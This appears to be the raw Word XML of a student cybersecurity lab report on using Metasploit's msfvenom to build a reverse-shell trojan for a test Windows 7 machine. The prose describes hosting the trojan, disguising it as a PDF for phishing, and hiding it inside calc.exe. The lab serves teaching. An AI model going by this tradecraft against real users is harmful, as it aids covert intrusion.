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D5E6EC6" w14:textId="77777777" w:rsidR="009D6A10" w:rsidRDefault="009D6A10"/>
    <w:p w14:paraId="5ACC8296" w14:textId="77777777" w:rsidR="009D6A10" w:rsidRDefault="009D6A10"/>
    <w:p w14:paraId="72BA9A9E" w14:textId="77777777" w:rsidR="009D6A10" w:rsidRDefault="009D6A10"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9270"/>
      </w:tblGrid>
      <w:tr w:rsidR="009D6A10" w:rsidRPr="00427A4E" w14:paraId="24E9E4D5" w14:textId="77777777" w:rsidTr="00F37FD6">
        <w:trPr>
          <w:trHeight w:val="1079"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9270" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7BCA8F57" w14:textId="431BA345" w:rsidR="009D6A10" w:rsidRPr="00427A4E" w:rsidRDefault="0093039F" w:rsidP="008E1448">
            <w:pPr>
              <w:pStyle w:val="TITLEBOX1"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:noProof/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1653735F" wp14:editId="6436A4AC">
                  <wp:extent cx="5514340" cy="1961515"/>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SU_IST_RGB_Black.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId8">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5514340" cy="1961515"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D6A10" w:rsidRPr="0075659C" w14:paraId="0BB216D2" w14:textId="77777777" w:rsidTr="00F37FD6">
        <w:trPr>
          <w:trHeight w:val="971"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9270" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0488651F" w14:textId="263D7316" w:rsidR="00460E99" w:rsidRPr="00460E99" w:rsidRDefault="00460E99" w:rsidP="00460E99">
            <w:pPr>
              <w:pStyle w:val="BodyText2"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
              <w:t>Capstone</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve"> Experience</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DC00CA6" w14:textId="379BEB69" w:rsidR="009D6A10" w:rsidRPr="00F05C18" w:rsidRDefault="00672A08" w:rsidP="00F05C18">
            <w:pPr>
              <w:pStyle w:val="BodyText2"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
            <w:r w:rsidR="00460E99">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>ST 894</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D6A10" w:rsidRPr="00427A4E" w14:paraId="1E15F9F1" w14:textId="77777777" w:rsidTr="00F37FD6">
        <w:trPr>
          <w:trHeight w:val="773"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9270" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="00FCE2FC" w14:textId="39F28500" w:rsidR="009D6A10" w:rsidRDefault="00F12496" w:rsidP="005377C1">
            <w:pPr>
              <w:pStyle w:val="TITLEBOX1"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Lab </w:t>
            </w:r>
            <w:r w:rsidR="00653C7D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00F37FD6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
            <w:r w:rsidR="002C01C1">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00653C7D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Creating Attacks with Metasploit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A2239F3" w14:textId="652BEECA" w:rsidR="006D2FFA" w:rsidRPr="00427A4E" w:rsidRDefault="006D2FFA" w:rsidP="005377C1">
            <w:pPr>
              <w:pStyle w:val="TITLEBOX1"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Scott Finlon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C226426" w14:textId="77777777" w:rsidR="009D6A10" w:rsidRPr="00427A4E" w:rsidRDefault="009D6A10" w:rsidP="00140DA2">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E68D839" w14:textId="77777777" w:rsidR="009D6A10" w:rsidRPr="00427A4E" w:rsidRDefault="009D6A10" w:rsidP="00140DA2">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17965B98" w14:textId="77777777" w:rsidR="009D6A10" w:rsidRDefault="009D6A10" w:rsidP="00345468">
      <w:pPr>
        <w:pStyle w:val="Header"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="4320"/>
          <w:tab w:val="clear" w:pos="8640"/>
          <w:tab w:val="center" w:pos="4680"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E4493CE" w14:textId="77777777" w:rsidR="009D6A10" w:rsidRDefault="009D6A10" w:rsidP="00345468">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:sectPr w:rsidR="009D6A10" w:rsidSect="00481D2D">
          <w:headerReference w:type="default" r:id="rId9"/>
          <w:footerReference w:type="default" r:id="rId10"/>
          <w:footerReference w:type="first" r:id="rId11"/>
          <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1872" w:left="1440" w:header="1440" w:footer="432" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720"/>
          <w:noEndnote/>
          <w:titlePg/>
          <w:docGrid w:linePitch="326"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27E751E1" w14:textId="77777777" w:rsidR="009D6A10" w:rsidRDefault="009D6A10" w:rsidP="005377C1">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="703CEAF2" w14:textId="77777777" w:rsidR="009D6A10" w:rsidRPr="009F55CD" w:rsidRDefault="005377C1" w:rsidP="005377C1">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0E2752" w14:textId="77777777" w:rsidR="009D6A10" w:rsidRPr="009F55CD" w:rsidRDefault="009D6A10" w:rsidP="005377C1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkStart w:id="0" w:name="_Toc334629029" w:displacedByCustomXml="next"/>
    <w:bookmarkStart w:id="1" w:name="_Toc334693194" w:displacedByCustomXml="next"/>
    <w:bookmarkStart w:id="2" w:name="_Toc335936745" w:displacedByCustomXml="next"/>
    <w:bookmarkStart w:id="3" w:name="_Toc253733702" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:id w:val="-291063847"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="6320EA7E" w14:textId="37F0E9A5" w:rsidR="00F05C18" w:rsidRDefault="00F05C18">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="26332688" w14:textId="299ABEB8" w:rsidR="00FA4D46" w:rsidRDefault="00F05C18">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc85145533" w:history="1">
            <w:r w:rsidR="00FA4D46" w:rsidRPr="00807341">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="00FA4D46">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FA4D46" w:rsidRPr="00807341">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>General Context</w:t>
            </w:r>
            <w:r w:rsidR="00FA4D46">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FA4D46">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FA4D46">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc85145533 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FA4D46">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FA4D46">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA4D46">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00FA4D46">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="135A06DA" w14:textId="0262A997" w:rsidR="00FA4D46" w:rsidRDefault="00FA4D46">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc85145534" w:history="1">
            <w:r w:rsidRPr="00807341">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00807341">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Technical Context</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc85145534 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7FC58BB2" w14:textId="7D9C5B4A" w:rsidR="00FA4D46" w:rsidRDefault="00FA4D46">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc85145535" w:history="1">
            <w:r w:rsidRPr="00807341">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00807341">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Solution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc85145535 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="588D15D6" w14:textId="6456203D" w:rsidR="00FA4D46" w:rsidRDefault="00FA4D46">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc85145536" w:history="1">
            <w:r w:rsidRPr="00807341">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc85145536 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="00D0E03C" w14:textId="378B9B6B" w:rsidR="00F05C18" w:rsidRDefault="00F05C18">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="38E7247C" w14:textId="77777777" w:rsidR="008E63D6" w:rsidRDefault="008E63D6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C34748D" w14:textId="17F3CBF7" w:rsidR="00460E99" w:rsidRDefault="00F12496" w:rsidP="00000726">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc85145533"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>General Context</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="5EDB563A" w14:textId="4D3F82E1" w:rsidR="00183DA6" w:rsidRDefault="008C4DB2" w:rsidP="00923E8C">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In this lab we utilize the Metasploit Framework and their </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tool to create a unique and tailored exploit that will be run on a vulnerable Windows 7 machine. Metasploit is an application framework that was created by HD Moore in 2003 and is has a modular interface that allows you to pick and choose different plugins and features to use. Metasploit is now actively developed and managed by Rapid7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188CD000" w14:textId="2472A1C9" w:rsidR="008C4DB2" w:rsidRDefault="008C4DB2" w:rsidP="00923E8C">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Metasploit is a favorite tool of many penetration testers. It’s very easy to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>use, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> has an extremely active community that is always developing new modules for new exploits that are found in the wild. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is a separate tool from the main Metasploit framework that combines </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>all of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the functionality of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfpaylod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfencode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> into a single tool, and it allows you to easily generate payloads in various formats and encode them into various encoder modules</w:t>
      </w:r>
      <w:r w:rsidRPr="008C4DB2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C4DB2">
        <w:t xml:space="preserve">(Introducing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C4DB2">
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C4DB2">
        <w:t xml:space="preserve"> | Rapid7 Blog, 2011)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. For this lab, we use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to create a reverse access trojan (RAT) that, when executed on a vulnerable machine, connects a reverse shell back to the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>attackers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> machine. Reverse shells are shell sessions that are established on a connection that is initiated from a remote machine, not from an </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>attackers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> machine</w:t>
      </w:r>
      <w:r w:rsidRPr="008C4DB2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C4DB2">
        <w:t>(Banach, 2019)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Reverse shells tend to have better success in penetrating network defenses, because traditionally networks have much more lax outbound rules than inbound. This means that because the attack is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>actually initiated</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from within a secure network, it is able to bypass a lot of traditional security measures and establish a connection from the attacker to the inside of the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB56A3E" w14:textId="1D3C4161" w:rsidR="008C4DB2" w:rsidRDefault="008C4DB2" w:rsidP="00923E8C">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In our exploit that we create, we call calc.exe and utilize a basic Python web server to host the file which can be downloaded to the vulnerable machine. This file can easily be modified to look like a pdf or any number of other file types that can be placed inside of a crafted phishing email and then sent out to numerous potential victims. Once everything is configured on an </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>attackers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> end, all they need to do is convince an end user to execute the exploit program and then the end user has absolutely no idea that a connection has been established to their machine. It’s even possible for these RATs to be placed inside actual functioning program like calc.exe so that when executed, not only do the victims not know that a reverse shell has been established but the Windows Calculator program opens simulating that nothing is wrong.</w:t>
      </w:r>
    </w:p>
